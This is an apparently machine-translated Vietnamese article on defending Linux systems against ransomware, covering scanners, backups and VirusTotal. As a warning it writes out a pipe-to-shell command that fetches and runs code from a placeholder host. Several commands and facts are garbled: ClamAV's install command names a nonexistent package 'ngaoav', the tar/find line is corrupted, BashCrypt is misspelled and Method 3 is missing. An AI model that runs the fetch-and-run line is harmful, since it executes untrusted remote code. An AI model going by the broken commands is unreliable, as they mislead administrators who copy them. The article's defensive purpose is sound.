Ransomware là một trong những vấn đề đe dọa nhất trong thế giới an ninh mạng ngày nay. Thật đáng sợ khi nghĩ rằng ai đó có thể giữ dữ liệu của bạn làm con tin. Một số vụ lây nhiễm ransomware mã hóa tất cả dữ liệu trên một khối lượng cụ thể và những cá nhân đứng sau nó yêu cầu một số tiền nhất định trước khi họ đồng ý phát hành khóa cần thiết để mở khóa dữ liệu đó. Điều này đặc biệt liên quan đến những người đầu tư nhiều tiền vào dữ liệu của họ. Tuy nhiên, có một tin vui nhỏ cho người dùng Linux.
Trong hầu hết các tình huống, mã ransomware khó có thể giành quyền kiểm soát bất cứ thứ gì hơn là chỉ thư mục chính của người dùng. Các chương trình này không có quyền chuyển toàn bộ cài đặt. Đây là lý do tại sao Linux ransomware là một vấn đề nhiều hơn trên các máy chủ mà các nhà khai thác luôn có quyền truy cập root. Ransomware không phải là vấn đề nhiều đối với người dùng Linux và có một số bước cần thực hiện để ngăn điều đó xảy ra với bạn.
Phương pháp 1: Bảo vệ chống lại các cuộc tấn công kiểu BashCrypt
BasyCrypt là một bằng chứng về khái niệm phần mềm tống tiền đã chứng minh rằng nó có thể lây nhiễm cấu trúc máy chủ bằng loại mã độc hại này. Điều này cung cấp một cơ sở cho các gói ransomware Linux có thể trông như thế nào. Mặc dù chúng hiện không phổ biến, nhưng các biện pháp phòng ngừa thông thường tương tự dành cho quản trị viên máy chủ của các nền tảng khác cũng hoạt động tốt ở đây. Vấn đề là trong môi trường cấp doanh nghiệp có thể có một số lượng lớn những người khác nhau sử dụng một hệ thống máy chủ.
Nếu bạn đang chạy một máy chủ thư, có thể rất khó để ngăn mọi người làm những điều dại dột. Cố gắng hết sức để nhắc mọi người không mở các tệp đính kèm mà họ không chắc chắn và luôn quét phần mềm độc hại mọi thứ có liên quan. Một điều khác thực sự có thể giúp ngăn chặn các loại tấn công này đến từ việc xem cách bạn cài đặt các tệp nhị phân với wget. Đương nhiên, máy chủ thư của bạn có thể thiếu hoàn toàn môi trường máy tính để bàn và bạn có thể sử dụng wget, apt-get, yum hoặc pacman để quản lý các gói sắp tới. Điều rất quan trọng là phải xem kho lưu trữ nào được sử dụng trong các cài đặt này. Đôi khi bạn sẽ thấy một lệnh muốn bạn thực thi một cái gì đó như wget http: //www.thisisaprettybadcoderepo.webs/ -O- | sh, hoặc nó có thể nằm bên trong một tập lệnh shell. Bằng cả hai cách, đừng chạy nó nếu bạn không biết kho lưu trữ đó dùng để làm gì.
Phương pháp 2: Cài đặt gói máy quét
Một số công nghệ quét phần mềm độc hại mã nguồn mở tồn tại. ClamAV cho đến nay là nổi tiếng nhất và bạn có thể cài đặt nó trên nhiều bản phân phối dựa trên apt bằng cách sử dụng:
sudo apt-get install ngaoav
Khi nó được cài đặt, người dùng phải giải thích cách sử dụng bằng ngôn ngữ đơn giản. Hãy nhớ rằng mặc dù nó có thể quét và xóa các tệp bị nhiễm bệnh, nhưng nó không thể thực sự xóa mã lây nhiễm khỏi tệp. Đây là một tình huống tất cả hoặc không có gì.
Có một máy quét thứ hai mà bạn có thể không quen thuộc, nhưng sẽ rất hữu ích nếu các quy trình ẩn làm bạn sợ hãi. Một lần nữa nếu bạn đang sử dụng bản phân phối dựa trên apt, thì hãy phát hành lệnh này để cài đặt trình quét hiện ẩn:
sudo apt-get install unhide
Khi nó được cài đặt, hãy nhập:
sudo unhide sys
Thao tác này sẽ quét toàn bộ hệ thống của bạn để tìm bất kỳ quy trình ẩn nào.
Phương pháp 4: Giữ sạch các bản sao lưu trong tay
Mặc dù điều này thậm chí không phải là một vấn đề vì mọi người phải luôn sao lưu, nhưng có bản sao lưu tốt có thể ngay lập tức loại bỏ ransomware. Rất ít ransomware có trên nền tảng Linux có xu hướng tấn công các tệp có phần mở rộng dành riêng cho các nền tảng phát triển Web. Điều này có nghĩa là nếu bạn có rất nhiều mã .php, .xml hoặc .js, bạn sẽ đặc biệt muốn sao lưu điều này. Hãy xem xét dòng mã sau:
tar -cf backups.tar $ (find -name “* .ruby” -hoặc -name “* .html”)
Thao tác này sẽ tạo một tệp lưu trữ băng lớn của mọi tệp có phần mở rộng .ruby và .html trong cấu trúc tệp. Sau đó, nó có thể được chuyển đến một thư mục con tạm thời khác để trích xuất nhằm đảm bảo rằng việc tạo nó hoạt động bình thường.
Kho lưu trữ băng này có thể và nên được chuyển sang một ổ đĩa bên ngoài. Tất nhiên, bạn có thể sử dụng nén .bz2, .gz hoặc .xv trước khi thực hiện. Bạn có thể muốn tạo bản sao lưu được nhân đôi bằng cách sao chép nó sang hai tập khác nhau.
Phương pháp 5: Sử dụng máy quét dựa trên web
Có lẽ bạn đã tải xuống gói RPM hoặc DEB từ một trang web hứa hẹn chứa phần mềm hữu ích. Phần mềm cũng được phân phối qua 7z hoặc tệp tar nén. Người dùng di động cũng có thể nhận được các gói Android ở định dạng APK. Thật dễ dàng để quét chúng bằng một công cụ ngay trong trình duyệt của bạn. Trỏ nó đến https://www.virustotal.com/ và khi trang tải xong, hãy nhấn vào nút 'Chọn tệp'. Trước khi bạn tải lên, hãy nhớ rằng đây là một máy chủ công cộng. Mặc dù an toàn và được điều hành bởi Alphabet Inc, nhưng nó lại truyền tệp một cách công khai, đây có thể là một vấn đề trong một số môi trường siêu bảo mật. Nó cũng bị giới hạn ở các tệp 128 MB.
Chọn tệp của bạn trong hộp xuất hiện và chọn mở. Tên tệp sẽ xuất hiện ở dòng bên cạnh nút sau khi hộp biến mất.
Nhấp vào màu xanh lam lớn 'Quét nó!' cái nút. Bạn sẽ thấy một hộp khác cho biết rằng hệ thống đang tải lên tệp của bạn.
Nếu ai đó đã kiểm tra tệp trước đó, thì nó sẽ thông báo cho bạn về báo cáo trước đó. Nó nhận ra điều này dựa trên tổng SHA256, hoạt động theo cách giống như các công cụ dòng lệnh Linux tương tự mà bạn đã quen. Nếu không, nó sẽ chạy toàn bộ quá trình quét với 53 chương trình quét khác nhau. Một vài trong số chúng có thể hết thời gian chờ khi tệp được chạy và những kết quả này có thể được bỏ qua một cách an toàn.
Một số chương trình có thể trả về kết quả khác với các chương trình khác, vì vậy, rất dễ dàng loại bỏ kết quả dương tính giả với hệ thống này. Phần tốt nhất là nó hoạt động giữa các nền tảng khác nhau, điều này làm cho nó hấp dẫn như nhau bất kể bạn có bản phân phối nào trên các thiết bị khác nhau. Nó cũng hoạt động tốt với các bản phân phối di động như Android, đó là lý do tại sao đây là một cách tuyệt vời để kiểm tra các gói APK trước khi sử dụng chúng.
4 phút đọc
